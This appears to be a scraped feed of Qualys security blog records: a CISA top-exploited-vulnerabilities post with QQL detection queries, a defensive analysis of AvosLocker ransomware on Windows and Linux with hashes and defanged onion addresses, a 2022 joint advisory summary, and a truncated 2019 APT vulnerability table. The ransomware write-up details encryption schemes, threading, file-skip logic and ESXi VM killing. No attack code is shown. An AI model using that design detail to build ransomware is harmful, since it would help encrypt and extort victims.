blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like &quot;Cloud Environments&quot;, &quot;Type: Servers&quot;, &quot;Web Servers&quot;, and &quot;VMDR-Web Servers&quot; to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the &quot;Show only Patchable&quot; toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the &quot;.avos&quot; extension. An updated variant appends with the extension &quot;.avos2&quot;. Similarly, the Linux version appends with the extension &quot;.avoslinux&quot;.\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker&#x27;s latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\nFig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\nFig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the &quot;avo2&quot; extension to the file using MoveFileWithprogressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended &quot;avos2&quot; extensions.\n\nFig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the &quot;ID&quot; mentioned on the ransom note to AvosLocker&#x27;s website (fig. 19), the victim will be redirected to the &quot;payment&quot; page.\n\nFig. 19: AvosLocker&#x27;s Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux &amp; ESXi.\n * Affiliate panel\n * Negotiation panel with push &amp; sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\nFig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.&#x27;s CISA, NSA, and FBI; Canada&#x27;s CCCS; U.K.&#x27;s NCSC-UK; Australia&#x27;s ACSC; and New Zealand&#x27;s NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities principal in specific targets&#x27; networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVE or CVE chains. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPNs&#x27; CVE-2018-13379 and widespread vulnerabilities such as Apache&#x27;s Log4Shell (CVE-2021-44228). They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine and VMware. The exploitation often resulted from organizations&#x27; failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities that could potentially lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer initial network access to cyber criminals, enabling infamous activities like data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities that could potentially compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, exploits Apache&#x27;s log4j Java library, possibly leading to a total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian&#x27;s Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. \n\n### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**\n\nOur data, which sheds light on the patching behavior for 12 significant vulnerabilities, is pulled from the Qualys TruRisk Platform. This data is anonymized to ensure that any data analysis cannot revert to identifying specific organization or asset information. \n\nThe data highlights a prominent challenge where some vulnerabilities witness rapid mitigation, highlighting proactive security measures. In contrast, others face prolonged remediation times, raising concerns about potential exposure risks. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot contrasting the patch rates and remediation times for 12 frequently exploited vulnerabilities in 2022 further illustrates this point. It shows that while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to do so with speed and diligence, especially for high-risk vulnerabilities. \n\n\n\nFig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022 \n\nThe damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights. \n\n### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines** \n\nThe recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management. \n\nQualys&#x27; suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with CSA&#x27;s call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys&#x27; unified platform, organizations can efficiently adhere to international best practices outlined in the CSA, enhancing their defense against cyber threats. \n\nIn addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection. \n\nQualys Threat Protection aligns seamlessly with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA&#x27;s guidelines and achieve a fortified security posture. \n\nQualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It is leveraging an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments and bypassing the limitations of signature-based systems. \n\n\n\nFig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022 \n\nThe [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON zipped) helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score, high-risk vulnerabilities, and Top Exploited Vulnerabilities. Once you identify the vulnerable assets for these top vulnerable CVEs prioritized among your remediation owners, you can instantly use Qualys Patch management to reduce the risk. \n\nIn conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routine vulnerabilities. Qualys provides robust solutions that align seamlessly with CSA&#x27;s recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing landscape. Consequently, organizations can strengthen their defenses against cyber threats by sticking to CSA guidelines and leveraging comprehensive cybersecurity solutions like Qualys&#x27;. \n\n## References\n\n[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)\n\n## Additional Contributor \n\n * Ramesh Ramachandran, Principal Product Manager, Qualys\n * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-24T19:07:05", "type": "qualysblog", "title": "Qualys Tackles 2022\u2019s Top Routinely Exploited Cyber Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-24T19:07:05", "id": "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 